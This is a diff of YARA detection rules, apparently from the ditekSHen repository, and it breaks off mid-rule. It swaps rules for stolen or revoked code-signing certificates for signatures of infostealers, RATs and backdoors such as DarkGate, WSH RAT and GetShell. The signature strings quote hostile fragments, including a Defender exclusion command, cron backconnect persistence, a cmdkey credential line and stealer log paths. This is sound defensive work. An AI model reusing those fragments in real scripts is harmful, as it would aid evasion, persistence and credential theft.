-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4166-L4177"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10489-L10505"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e0a9868f9a42aeb8f90aff540a73bc8fa1bfebbf8ee6c0c71bd921cf914e0875"
+		logic_hash = "4c3a09f10c792de1ab25001da29ea2fee84c583d49d9a5225817644aabde2dea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "188810cf106a5f38fe8aa0d494cbd027da9edf97"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\DateTime" fullword ascii
+		$s2 = "%s?p=%lu" fullword ascii
+		$s3 = "-upd" ascii
+		$s4 = "[%RAND%]" fullword ascii
+		$s5 = "MAIL FROM:<%s>" fullword ascii
+		$s6 = "RCPT TO:<%s>" fullword ascii
+		$s7 = "Message-ID: <%s%s>" fullword ascii
+		$s8 = "Content-Disposition: attachment; filename=\"%s%s\"" fullword ascii
+		$s9 = "http://www.%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0F7E3Fda780E47E171864D8F5386Bc05 : FILE
+rule DITEKSHEN_MALWARE_Win_Ragestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "33b8ce54-fa2c-5aac-9022-2309f7fc4a86"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detect Rage / Priv8 infostealer"
+		author = "ditekShen"
+		id = "dfc1abaa-d975-5e6a-ad4d-344031b0c40c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4192-L4203"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10507-L10522"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "30e2daf85ee7f9f9615a49af949a034b50a97a1a7abf6a318547809cc9e7b0b7"
+		logic_hash = "a26b86845bcd62d4a360a8dae9cfa56b5d96ebc521f224c18a01cc0a2bd958e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1e3dd5576fc57fa2dd778221a60bd33f97087f74"
-		importance = 20
+
+	strings:
+		$x1 = "\\RageStealer\\obj\\" ascii
+		$x2 = "Priv8 Stealer" wide
+		$s1 = "\\Screen.png" wide
+		$s2 = "Content-Disposition: form-data; name=\"document\"; filename=\"{1}\"" wide
+		$s3 = "NEW LOG FROM" wide
+		$s4 = "GRABBED SOFTWARE" wide
+		$s5 = "DOMAINS DETECTED" wide
+		$s6 = "snder" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Louhos Solutions Oy" and pe.signatures [ i ] . serial == "0f:7e:3f:da:78:0e:47:e1:71:86:4d:8f:53:86:bc:05" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C2Cbbd946Bc3Fdb944D522931D61D51A : FILE
+rule DITEKSHEN_MALWARE_Win_Abubasbanditbot : FILE
 {
 	meta:
-		description = "Detects executables signed with Sordum Software certificate, particularly Defender Control"
+		description = "Detects Abubasbandit Bot. Observed to drop cryptocurrency miner detected by MALWARE_Win_CoinMiner02"
 		author = "ditekSHen"
-		id = "b8ccfb1a-4e3f-5823-af38-e1607458023e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8bedd1f7-bd77-5f26-8665-1d23fe56100f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4231-L4242"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10524-L10541"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e67835cf85c713ef5a21b866a277e90236c607fb67d3fd9b2bba627c31d9e97"
+		logic_hash = "aae40178dadff720b42d211a025fd696eabdcc91761c6a91809f5f088c588c31"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f5e71628a478a248353bf0177395223d2c5a0e43"
-		importance = 20
+
+	strings:
+		$x1 = "magickeycmd" ascii
+		$x2 = "chat_id" ascii
+		$x3 = "GetTempPathW" ascii
+		$x4 = "Add-MpPreference" ascii
+		$x5 = "-Command" ascii
+		$s1 = "application/x-www-form-urlencoded" ascii
+		$s2 = "gzip, deflate/index.html" ascii
+		$s3 = "powershellAdd-MpPreference -ExclusionPath" ascii
+		$s4 = "tar-xf-C" ascii
+		$s5 = "temp_file.bin" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sordum Software" and pe.signatures [ i ] . serial == "c2:cb:bd:94:6b:c3:fd:b9:44:d5:22:93:1d:61:d5:1a" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 4 of ( $x* ) and 2 of ( $s* ) ) or ( ( all of ( $s* ) and 3 of ( $x* ) ) ) or ( 8 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : FILE
+rule DITEKSHEN_MALWARE_Win_Oracrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OracRAT / Comfoo / Babar"
 		author = "ditekSHen"
-		id = "d23e7b9b-4424-50c5-a768-9cb33e0de192"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "53f3778e-56d5-5390-8ce7-82d4ede46be4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4244-L4255"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10543-L10557"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "45e2833dedacd875912d07dc63216400ddff76846f9c7bdf808f1db56ed4720c"
+		logic_hash = "078a5df9f3d0bb8213ea2fe28eefdb453ef186e6c1f62d3ba10cb04fca047700"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "677054afcbfecb313f93f27ed159055dc1559ad0"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\DevCtrlKrnl" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\IE4\\Setup" fullword ascii
+		$s3 = "\\PLUGINS" fullword ascii
+		$s4 = "\\config\\sam" fullword ascii
+		$s5 = "\\iexplore.exe\" about:blank" fullword ascii
+		$s6 = "usbak.sys" fullword ascii
+		$s7 = "userctfm" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aa12C95D2Bcde0Ce141C6F1145B0D7Ef : FILE
+rule DITEKSHEN_MALWARE_Win_Phemedronestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Phemedrone Stealer infostealer"
 		author = "ditekSHen"
-		id = "66ef7681-7467-5c9f-8e0b-749a9711f15a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "297aab1f-351c-5955-8a19-9aa2b7c94748"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4257-L4268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10559-L10580"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34edd92640d8059f074513b526c7a2bf0d9265af9466a2ae66b93255044744c4"
+		logic_hash = "74e150cc971f5648f9e3f6146afba162b1a29cf2744c862b2320db52c2efa930"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1383c4aa2900882f9892696c537e83f1fb20a43f"
-		importance = 20
+
+	strings:
+		$p1 = /\{ file = \{(0|file)\}, data = \{(1|data)\} \}/ ascii wide
+		$p2 = "{ <>h__TransparentIdentifier0 = {0}, match = {1} }" wide
+		$p3 = "{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }" wide
+		$p4 = "{<>h__TransparentIdentifier0}, match = {match} }" ascii
+		$p5 = "{<>h__TransparentIdentifier1}, encrypted = {encrypted} }" ascii
+		$s1 = "<KillDebuggers>b__" ascii
+		$s2 = "<ParseExtensions>b__" ascii
+		$s3 = "<ParseDiscordTokens>b__" ascii
+		$s4 = "<IsVM>b__" ascii
+		$s5 = "<Key3Database>b__" ascii
+		$s6 = "masterPass" ascii
+		$s7 = "rootLocation" ascii
+		$s8 = "rgsServiceNames" ascii
+		$s9 = "rgsFilenames" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROKON, OOO" and pe.signatures [ i ] . serial == "00:aa:12:c9:5d:2b:cd:e0:ce:14:1c:6f:11:45:b0:d7:ef" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $p* ) and 3 of ( $s* ) ) or ( 3 of ( $p* ) and 4 of ( $s* ) ) or ( 7 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03E9Eb4Dff67D4F9A554A422D5Ed86F3 : FILE
+rule DITEKSHEN_MALWARE_Win_WSHRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects WASHRAT"
 		author = "ditekSHen"
-		id = "b76ab1af-01f9-5d03-8d5e-7314a7a2de43"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e7940b7f-51dd-5a32-899b-64310f27bf3e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4270-L4281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10582-L10600"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a56f53cb94f78496b4935fc2a613d030bd550b749427501dd9dda18cb9e05ab3"
+		logic_hash = "297bfe65815637a464e2a8fc23570c6e79694ffe0467d5898b7c845f1450de95"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8f2de7e770a8b1e412c2de131064d7a52da62287"
-		importance = 20
+
+	strings:
+		$x1 = "WSH Rat v" wide
+		$x2 = "SOFTWARE\\WSHRat" wide
+		$x3 = "WSH Remote" wide nocase
+		$x4 = "WSHRAT" wide nocase
+		$s1 = "shellobj.regwrite \"HKEY_" ascii nocase
+		$s2 = "shellobj.run(\"%comspec% /c" ascii nocase
+		$s3 = "objhttpdownload.setrequestheader \"user-agent:\"," ascii nocase
+		$s4 = "WScript.CreateObject(\"Shell.Application\").ShellExecute" ascii nocase
+		$s5 = "objwmiservice.ExecQuery(\"select" ascii nocase
+		$s6 = "httpobj.open(\"post\",\"http" ascii nocase
+		$s7 = /(rdp|keylogger|get-pass|uvnc)\|http/ wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "philandro Software GmbH" and pe.signatures [ i ] . serial == "03:e9:eb:4d:ff:67:d4:f9:a5:54:a4:22:d5:ed:86:f3" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : FILE
+rule DITEKSHEN_MALWARE_Win_Rustystealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Rusty / Luca stealer"
 		author = "ditekSHen"
-		id = "4e39ae25-c62c-5018-9780-d1549b10942f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "af39f88c-e0df-51f6-bb11-f3a7231180d0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4283-L4294"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10602-L10625"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2493dfe7e5a993a573c7b3c2f2642a8834feb525b3fc8402315a63ac09b9fccd"
+		logic_hash = "e60e66360c8f97a31e75cd90a12519f75f3a672874fc985a8da1d4d02e185b4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b37e7f9040c4adc6d29da6829c7a35a2f6a56fdb"
-		importance = 20
+
+	strings:
+		$s1 = "EdgeMicrosoftedgechromiumChromium7star7StaramigoAmigobraveBrave" ascii
+		$s2 = "BrowserchromeChromekometaKometaorbitumOrbitumsputnikSputniktorchTorchucozmediaUranuCozMediavivaldiVivaldiatom" ascii
+		$s3 = ".kdbx.pdf.doc.docx.xls.xlsx.ppt.pptx.odt.odp\\logscx\\sensfiles.zip" ascii
+		$s4 = "dumper.rs" ascii
+		$s5 = "decryption_core.rs" ascii
+		$s6 = "anti_emulation.rs" ascii
+		$s7 = "discord.rs" ascii
+		$s8 = /\\logscx\\(passwords_|cookies_|creditcards_)/ ascii
+		$s9 = "VirtualBoxVBoxVMWareVMCountry" ascii
+		$s10 = "New Log From ( /  )" ascii
+		$s11 = "BrowserChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldiAtomMail" ascii
+		$s12 = "BrowserBraveSoftwareCentBrowserChedotChrome" ascii
+		$s13 = "ChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldi" ascii
+		$s14 = "hostnameencryptedUsernameencryptedPasswordstruct" ascii
+		$s15 = "encryptedPassword" fullword ascii
+		$s16 = "AutoFill@~" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C6D7Ad852Af211Bf48F19Cc0242Dcd72 : FILE
+rule DITEKSHEN_MALWARE_Win_Simplepacker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Hydrochasma packer / dropper"
 		author = "ditekSHen"
-		id = "1aca90d4-6cb6-5bcd-a4c9-e8f8cddc0d04"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "449f7531-408f-5bda-aa64-d148c363c3e5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4296-L4307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10627-L10638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e10de48bfa1edec81157eb95ef3478346c22dd6f7ef163e30887d3c7bb580c5e"
+		logic_hash = "e2c07947fdf53814669250052f6cceb7412aa302422f3a0b430879da638c7e6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bddcef09f222ea4270d4a1811c10f4fcf98e4125"
-		importance = 20
+
+	strings:
+		$p1 = "\\cloud-compiler-" ascii
+		$p2 = "\\deps\\simplepacker.pdb" ascii
+		$s1 = "uespemosarenegylmodnarodsetybdetqueue" ascii
+		$s2 = "None{\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APDZQKILIIQVIJSCTY" and pe.signatures [ i ] . serial == "c6:d7:ad:85:2a:f2:11:bf:48:f1:9c:c0:24:2d:cd:72" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $p* ) or ( 1 of ( $p* ) and all of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0084888D5A12228E8950683Ecdab62Fe7A : FILE
+rule DITEKSHEN_MALWARE_Multi_Golangbypassav : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Go executables using GolangBypassAV"
 		author = "ditekSHen"
-		id = "5036d604-55df-565a-b6db-c788da007ea8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bd41ff7e-ce57-5bee-b6ca-9341b4c1c1fa"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4309-L4320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10679-L10689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4deda791923cdacccf57d54651ca44bd8c04d053a11ccf5700354f9f37be17de"
+		logic_hash = "842dfc7c04cbd19bbbc8b6fbf9d9925f81a21dfb713af4542ca4157d64fa5b51"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "390b23ed9750745e8441e35366b294a2a5c66fcd"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.GolangBypassAV"
+		clamav2 = "MALWARE.Linux.Trojan.GolangBypassAV"
+
+	strings:
+		$s1 = "/GolangBypassAV/gen/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ub30 Limited" and pe.signatures [ i ] . serial == "00:84:88:8d:5a:12:22:8e:89:50:68:3e:cd:ab:62:fe:7a" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 1 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_709D547A2F09D39C4C2334983F2Cbf50 : FILE
+rule DITEKSHEN_MALWARE_Win_Blankstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlankStealer / BlankGrabber / Blank-c Stealer"
 		author = "ditekSHen"
-		id = "e3b2ab8b-be90-5593-843f-59f2d626e604"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "19686781-4be8-56c1-b606-d8fe14dbdc48"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4322-L4333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10691-L10703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f45a2047181f3f07a8fb9cc00aafc31ba7aa369fc5c0165557757306a0de0d44"
+		logic_hash = "cc0c8d3e0061d192e445ef661387360644ab428a9e9fc2480e966db96bc8264c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f10095c5e36e6bce0759f52dd11137756adc3b53"
-		importance = 20
+		snort = "923829001"
+
+	strings:
+		$s1 = "Blank-c" ascii
+		$s2 = "Stealer License" ascii
+		$s3 = "UID=" ascii
+		$h1 = { 42 6c 61 6e 6b 2d 63 0a 53 74 65 61 6c 65 72 20 4c 69 63 65 6e 73 65 0a 55 49 44 3d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BMUZVYUGWSQWLAIISX" and pe.signatures [ i ] . serial == "70:9d:54:7a:2f:09:d3:9c:4c:23:34:98:3f:2c:bf:50" )
+		( uint16( 0 ) == 0x4152 and 2 of them ) or ( all of ( $s* ) or 1 of ( $h* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_98A04Ea05E8A949A4D880D0136794Df3 : FILE
+rule DITEKSHEN_MALWARE_Linux_Getshell : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect GetShell Linux backdoor"
 		author = "ditekSHen"
-		id = "cda10dcf-bc46-56d9-a4b5-60a76249334c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cccad93d-cd49-5237-96ac-66c9ac6ef532"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4335-L4346"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10705-L10725"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05c63386558b954da3cfec1fd514a7a567189d9ac33d818cbbabf3eaf72ed130"
+		logic_hash = "9d44ad2a3c270eed0e905402e8c32dcca54da90f4229d9d59874ee09b3b47277"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0387ce856978cfa3e161fc03751820f003b478f3"
-		importance = 20
+		clamav1 = "MALWARE.Linux.Trojan.GetShell"
+
+	strings:
+		$x1 = "cat <(echo '@reboot echo socks5_backconnect" ascii
+		$x2 = "(cd  && )') <(sed '/socks5_backconnect" ascii
+		$s1 = "cat <(echo '@" ascii
+		$s2 = "(cd  && )') <(sed '" ascii
+		$s3 = "PORT1:" ascii
+		$s4 = "HOST1:" ascii
+		$s5 = "queryheader" ascii
+		$s6 = "qsectionpost" ascii
+		$s7 = "packedip" ascii
+		$s8 = "copydata" ascii
+		$s9 = "synsend" ascii
+		$s10 = "bc_connect" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRVFMPRLNIMAMSUIMT" and pe.signatures [ i ] . serial == "98:a0:4e:a0:5e:8a:94:9a:4d:88:0d:01:36:79:4d:f3" )
+		uint16( 0 ) == 0x457f and ( ( all of ( $x* ) and 1 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2355895F1759E9E3648026F4 : FILE
+rule DITEKSHEN_MALWARE_Win_Solarmarker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SolarMarker"
 		author = "ditekSHen"
-		id = "d716ed7f-8886-587d-a868-805da13bb925"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "78c2f739-76b2-5a80-8b9a-6c677d578eaa"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4348-L4360"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10727-L10745"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "429375af70872755ab2d517b125042795c9a20238405a4af5b0caecc46a3f563"
+		logic_hash = "84182c8948c2f40439cd932885ae8b88bb677ecc9fba366f22d30e13dc4ffb68"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f46d457898d436769f0c70127044e2019583ee16"
-		hash1 = "f4f4a5953d0c87db611fa05bb51672591295049978a0e9e14eca8224254ecd7a"
-		importance = 20
+
+	strings:
+		$x1 = "token_type" fullword ascii
+		$x2 = "request_data" fullword ascii
+		$x3 = "request_timeout" fullword ascii
+		$x4 = { 74 6f 6b 65 6e 73 00 66 72 6f 6d 00 74 6f 00 73 5f (66|72) }
+		$s1 = "set_UseShellExecute" fullword ascii
+		$s2 = "<Select>b__0" fullword ascii
+		$s3 = "<get>b__e" fullword ascii
+		$s4 = "<get>b__10" fullword ascii
+		$s5 = "<get>b__f" fullword ascii
+		$s6 = "<set>b__0" fullword ascii
+		$s7 = "<set>b__1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "23:55:89:5f:17:59:e9:e3:64:80:26:f4" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00818631110B5D14331Dac7E6Ad998B902 : FILE
+rule DITEKSHEN_MALWRE_Win_Darkgate : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkGate infostealer and coinminer"
 		author = "ditekSHen"
-		id = "15efa9cf-5457-5b04-abee-8f86721c5d56"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4488e1e6-daac-5832-8326-3151c834daf1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4376-L4390"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10747-L10771"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee82090ceb1378b44c283586d0f0b6ec0d9779fab2497b0168acec8e5546a4a8"
+		logic_hash = "805a04bbb3915d539e76927393384a2786c25490e8b9fc151d5b12415247578b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "c93082334ef8c2d6a0a1823cdf632c0d75d56377"
-		importance = 20
+
+	strings:
+		$x1 = "SYSTEM Elevation: Completed, new DarkGate connection with SYSTEM privileges" ascii
+		$x2 = "-u 0xDark" ascii
+		$x3 = "DarkGate" ascii
+		$x4 = "/c cmdkey /generic:\"127.0.0.2\" /user:\"SafeMode\" /pass:\"darkgatepassword0\"" ascii
+		$s1 = "c:\\temp\\crash.txt" ascii
+		$s2 = "/cookiesfile \"" ascii
+		$s3 = "/c rmdir /s /q \"" ascii
+		$s4 = "/c xcopy /E /I /Y \"%s\" \"%s\" && exit" ascii
+		$s5 = "U_MemScan" ascii
+		$s6 = "U_Google_AD" ascii
+		$s7 = "untBotUtils" ascii
+		$s8 = "____padoru____" ascii
+		$s9 = "u_SysHook" ascii
+		$s10 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" ascii
+		$s11 = "C:\\Windows\\System32\\ntdll.dll" fullword ascii
+		$s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii
+		$s13 = /Stub: (WARNING:|Configuration updated:|Global Ping Invoked)/ ascii
 
 	condition:
